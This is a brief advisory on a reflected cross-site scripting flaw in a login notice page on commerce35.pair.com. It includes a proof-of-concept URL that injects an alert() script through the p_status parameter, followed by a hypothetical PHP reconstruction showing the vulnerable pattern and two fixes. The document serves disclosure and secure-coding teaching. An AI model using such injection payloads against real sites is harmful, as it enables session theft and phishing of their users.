commerce35.pair.com suffers from a cross-site scripting vulnerability.
fefe9b8f7502d1abb958d5e6a58da6492ac244adee03f1d83521fd0367ae8226
Author: Max Dietz
Description: After logging in, the message displayed to the user is carried
in a GET request parameter (p_status), on which no sanitizing is done, so the
value is reflected into the page as-is.
PoC:
https://commerce35.pair.com/inres/notify/index.php?action=loginform&p_status=<script>javascript:alert("HELLO");</script>
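
The flaw described above and two ways to close it, as an added example that is not the site's code: the handler is a hypothetical reconstruction, and the function names, status codes and message texts are assumptions (only the parameter name p_status comes from the advisory).

```php
<?php
// Hypothetical reconstruction: the real index.php source is not on the page.

// Vulnerable pattern: the GET value is written into the HTML unchanged,
// so any markup in p_status is parsed by the browser.
function render_status_vulnerable(array $query): string
{
    $status = $query['p_status'] ?? '';
    return '<p class="status">' . $status . '</p>';
}

// Fix 1: encode on output for the HTML text context.
function render_status_encoded(array $query): string
{
    $status = $query['p_status'] ?? '';
    if (!is_string($status)) {          // p_status[]=x arrives as an array
        $status = '';
    }
    $safe = htmlspecialchars($status, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="status">' . $safe . '</p>';
}

// Fix 2: carry only a short code in the URL and look the text up
// server-side, so no request-supplied text reaches the page at all.
const STATUS_MESSAGES = [               // constructed sample messages
    'ok'        => 'You are now logged in.',
    'bad_login' => 'Login failed.',
];

function render_status_allowlisted(array $query): string
{
    $code = $query['p_status'] ?? '';
    $text = is_string($code) ? (STATUS_MESSAGES[$code] ?? '') : '';
    return '<p class="status">' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Constructed input mirroring the p_status value from the PoC above.
$query = ['p_status' => '<script>javascript:alert("HELLO");</script>'];
echo render_status_vulnerable($query), "\n";   // markup passes through intact
echo render_status_encoded($query), "\n";      // markup is entity-encoded
echo render_status_allowlisted($query), "\n";  // unknown code, empty message
```

Fix 2 removes the reflection entirely; Fix 1 is the minimum when free-text messages must stay in the URL.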